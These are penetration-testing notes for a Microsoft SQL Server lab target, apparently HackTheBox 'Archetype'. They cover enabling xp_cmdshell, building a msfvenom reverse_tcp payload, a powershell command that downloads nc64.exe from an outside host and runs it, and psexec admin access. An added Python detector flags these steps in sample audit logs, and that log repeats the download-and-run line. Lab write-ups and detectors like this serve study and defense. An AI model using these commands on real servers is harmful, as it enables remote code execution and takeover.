Pentesting MsSql
ms-sql-s port 1433
Use impacket mssqlclient.py to connect:
python mssqlclient.py ARCHETYPE/[email protected] -windows-auth
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
Check which role we have on the server:
SELECT is_srvrolemember('sysadmin');
If the output is 1, it translates to True.
Check to see if xp_cmdshell is enabled:
SQL> EXEC xp_cmdshell 'net user';
Set up command execution through xp_cmdshell:
EXEC xp_cmdshell 'net user'; -- priv
On MSSQL 2005 you may need to reactivate xp_cmdshell first, as it is disabled by default:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure; -- enabling sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Now we are able to execute system commands:
xp_cmdshell "whoami"
Better Command Execution
xp_cmdshell "powershell -c pwd"
Get a shell on the target with nc or msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.154 LPORT=80 -f exe -o shell.exe
python3 -m http.server
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe; ./nc64.exe"
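The sp_configure/xp_cmdshell sequence above and the later xp_cmdshell download-and-run step leave a very recognisable trail in captured batch text. The following detector is an added example (not from the original notes): it runs over constructed log lines modelled on a SQL Server Audit or Extended Events capture of statement text and flags the precursor, the enable step, and each xp_cmdshell execution, escalating when the command fetches an external tool. The log format is an assumption for the example.

```python
import re

# Constructed sample capture (assumed format: "<ts> login=<login> stmt=<batch text>").
SAMPLE_LOG = """\
2024-05-01T10:00:01Z login=ARCHETYPE\\sql_svc stmt=SELECT name FROM sys.databases;
2024-05-01T10:00:05Z login=ARCHETYPE\\sql_svc stmt=EXEC sp_configure 'show advanced options', 1;
2024-05-01T10:00:06Z login=ARCHETYPE\\sql_svc stmt=RECONFIGURE;
2024-05-01T10:00:09Z login=ARCHETYPE\\sql_svc stmt=EXEC sp_configure 'xp_cmdshell', 1;
2024-05-01T10:00:10Z login=ARCHETYPE\\sql_svc stmt=RECONFIGURE;
2024-05-01T10:00:15Z login=ARCHETYPE\\sql_svc stmt=xp_cmdshell "whoami"
2024-05-01T10:00:40Z login=ARCHETYPE\\sql_svc stmt=xp_cmdshell "powershell -c wget http://10.10.14.9/nc64.exe -outfile nc64.exe; ./nc64.exe"
2024-05-01T10:01:00Z login=ARCHETYPE\\analyst stmt=SELECT is_srvrolemember('sysadmin');
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) login=(?P<login>\S+) stmt=(?P<stmt>.*)$")
ENABLE_RE = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.I)
ADVANCED_RE = re.compile(r"sp_configure\s+'show advanced options'\s*,\s*1\b", re.I)
EXEC_RE = re.compile(r"\bxp_cmdshell\b", re.I)
# Indicators that the OS command is fetching or launching something external.
DOWNLOAD_RE = re.compile(r"powershell|wget|curl|certutil|invoke-webrequest|https?://", re.I)


def classify(stmt):
    """Return (severity, reason) for one statement, or None if it is not of interest."""
    if ENABLE_RE.search(stmt):
        return ("high", "xp_cmdshell enabled via sp_configure")
    if ADVANCED_RE.search(stmt):
        return ("low", "'show advanced options' turned on (precursor to enabling xp_cmdshell)")
    # Plain xp_cmdshell invocation; sp_configure lines (enable/disable) are handled above.
    if EXEC_RE.search(stmt) and "sp_configure" not in stmt.lower():
        if DOWNLOAD_RE.search(stmt):
            return ("critical", "xp_cmdshell used to download or launch an external tool")
        return ("high", "OS command executed through xp_cmdshell")
    return None


def scan(log_text):
    """Parse the capture and return (ts, login, severity, reason) for each flagged statement."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed format
        hit = classify(m["stmt"])
        if hit:
            findings.append((m["ts"], m["login"], *hit))
    return findings


if __name__ == "__main__":
    for ts, login, severity, reason in scan(SAMPLE_LOG):
        print(f"{ts} {severity:8} {login}: {reason}")
```

The RECONFIGURE lines are deliberately not flagged on their own; the enable step is the signal, and correlating it with the first xp_cmdshell execution from the same login is what makes the sequence worth alerting on.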
Find the admin password from the shell
python /usr/local/bin/psexec.py [email protected]